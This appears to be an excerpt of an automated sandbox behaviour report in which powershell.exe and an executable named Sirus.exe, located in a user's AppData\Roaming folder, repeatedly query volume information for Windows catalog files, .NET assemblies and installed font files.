      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Users\user\AppData\Roaming\Sirus.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
